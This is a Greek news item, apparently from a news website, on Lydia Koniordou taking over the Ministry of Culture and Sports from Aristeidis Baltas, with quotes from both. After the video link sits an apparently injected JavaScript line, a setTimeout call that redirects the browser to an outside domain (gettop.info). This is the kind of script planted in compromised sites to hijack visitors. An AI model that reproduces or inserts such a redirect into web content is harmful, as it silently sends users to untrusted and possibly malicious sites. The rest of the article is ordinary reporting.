Ανέλαβε τα καθήκοντά της η Λυδία Κονιόρδου (ΒΙΝΤΕΟ)

0
3

 

«Στο δικό μου μυαλό η ανάληψη μια κυβερνητικής θέσης ευθύνης, όπως του υπουργού, φέρνει μια μεθοδολογία» είπε ο Αριστείδης Μπαλτάς παραδίδοντας το υπουργείο Πολιτισμού και Αθλητισμού στη Λυδία Κονιόρδου.

«Μετά το σπουδαίο έργο θα είμαι φειδωλή, γιατί είναι καλό κάποιος να μιλά με έργα αντί με λόγια» είπε η νέα υπουργός, ευχαριστώντας και δημόσια τον πρωθυπουργό για την επιλογή του «για την τεράστια τιμή» στο πρόσωπό της.

«Χρειάζεται μεγάλη συστράτευση των δυνάμεων αυτή την κρίσιμη στιγμή που περνά η χώρα» τόνισε η νέα υπουργός, υπογραμμίζοντας: «Ο πολιτισμός πρέπει να συνδεθεί με την Παιδεία-που είναι το μέλλον του τόπου, με τον Τουρισμό και την παραγωγικότητα, με ήπιους τρόπους.

Να αναδειχθεί η παραγωγικότητα, τα περίφημα προϊόντα και οι δυνάμεις του τόπου μας, μέσα από μια υγιή επιχειρηματικότητα και την φιλοσοφία της αειφόρου ανάπτυξης, επειδή πρέπει να διατηρηθεί η μνήμη και η μοναδική ομορφιά του τόπου. Η πόρτα του υπουργείου θα είναι πάντοτε ανοιχτή στους αρχαιολόγους, τους καλλιτέχνες, τους λογοτέχνες, τους ανθρώπους του πνεύματος και της τέχνης για να τους διευκολύνουμε να φέρουν το έργο τους στον κόσμο» είπε η υπουργός.

https://youtu.be/e9-IQjerRsw setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here